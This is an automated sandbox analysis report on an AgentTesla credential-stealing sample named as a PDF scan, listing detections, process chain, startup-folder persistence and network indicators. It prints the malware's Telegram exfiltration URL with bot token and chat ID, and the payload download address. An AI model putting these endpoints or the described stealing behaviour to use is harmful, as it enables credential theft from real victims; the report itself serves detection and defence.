Windows Analysis Report
rScan_0984829339_PDF.exe

Overview

General Information

Sample name: rScan_0984829339_PDF.exe
Analysis ID: 1534432
MD5: a89dce2412407f0bd1f4b9e575545aeb
SHA1: 9ad65f7f6252c2df5c97b44000d12c988ec7d4a1
SHA256: c8c4a0f5bc0278f9392a4356ac121458f0f4d10420f65b468e7556b08c84ff5e
Tags: exeuser-Porcupine

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rScan_0984829339_PDF.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\rScan_0984829339_PDF.exe" MD5: A89DCE2412407F0BD1F4B9E575545AEB)
    • InstallUtil.exe (PID: 1472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6236 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Guid.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Roaming\Guid.exe" MD5: A89DCE2412407F0BD1F4B9E575545AEB)
      • InstallUtil.exe (PID: 6708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
2.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
2.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
2.2.InstallUtil.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (listed below)
  • 0x332ce:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33340:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x333ca:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3345c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x334c6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33538:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x335ce:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3365e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.Guid.exe.40bbf88.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

                      System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs", ProcessId: 6236, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs", ProcessId: 6236, ProcessName: wscript.exe

                      Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\rScan_0984829339_PDF.exe, ProcessId: 6272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T21:32:13.214696+0200 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49739 | 149.154.167.220 | 443 | TCP
2024-10-15T21:32:32.320933+0200 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP
2024-10-15T21:32:13.214696+0200 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49739 | 149.154.167.220 | 443 | TCP
2024-10-15T21:32:32.320933+0200 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP
2024-10-15T21:32:13.216256+0200 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.6 | 49739 | TCP
2024-10-15T21:32:32.322256+0200 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.6 | 49831 | TCP

                      AV Detection

Source: 5.2.Guid.exe.40bbf88.2.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}
Source: Guid.exe.5588.5.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}
Source: C:\Users\user\AppData\Roaming\Guid.exe; ReversingLabs: Detection: 31%
Source: rScan_0984829339_PDF.exe; ReversingLabs: Detection: 31%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Guid.exe; Joe Sandbox ML: detected
Source: rScan_0984829339_PDF.exe; Joe Sandbox ML: detected
Source: rScan_0984829339_PDF.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.6:49804 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49831 version: TLS 1.2
Source: rScan_0984829339_PDF.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rScan_0984829339_PDF.exe, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\

                      Networking

Source: Network traffic; Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49739 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49739 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.6:49739
Source: Network traffic; Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49831 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49831 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.6:49831
Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; HTTP traffic detected: GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1 | Host: rubberpartsmanufacturers.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dced2e8905a837 | Host: api.telegram.org | Content-Length: 924 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1 | Host: rubberpartsmanufacturers.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dced2e9445f11a | Host: api.telegram.org | Content-Length: 924 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; ASN Name: TELEGRAMRU
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: rubberpartsmanufacturers.com
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: unknown; HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dced2e8905a837 | Host: api.telegram.org | Content-Length: 924 | Expect: 100-continue | Connection: Keep-Alive
Source: InstallUtil.exe, 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://api.telegram.org
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/
Source: InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://rubberpartsmanufacturers.com
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://rubberpartsmanufacturers.com/hunziq/Sgtuwurbrz.mp3
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown; Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown; Network traffic detected: HTTP traffic on port 49739 -> 443

                      System Summary

Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
Source: initial sample; Static PE information: Filename: rScan_0984829339_PDF.exe
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E152F86_2_05E152F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E14C186_2_05E14C18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E12E606_2_05E12E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05E1B9206_2_05E1B920
                      Source: rScan_0984829339_PDF.exe Binary or memory string: OriginalFilename vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameYsnufioez.dll" vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2283852464.0000000006580000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameYsnufioez.dll" vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2285672157.00000000072C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000000.2162742766.0000000000942000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2260543550.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe Binary or memory string: OriginalFilenameXstojvsppb.exe6 vs rScan_0984829339_PDF.exe
                      Source: rScan_0984829339_PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
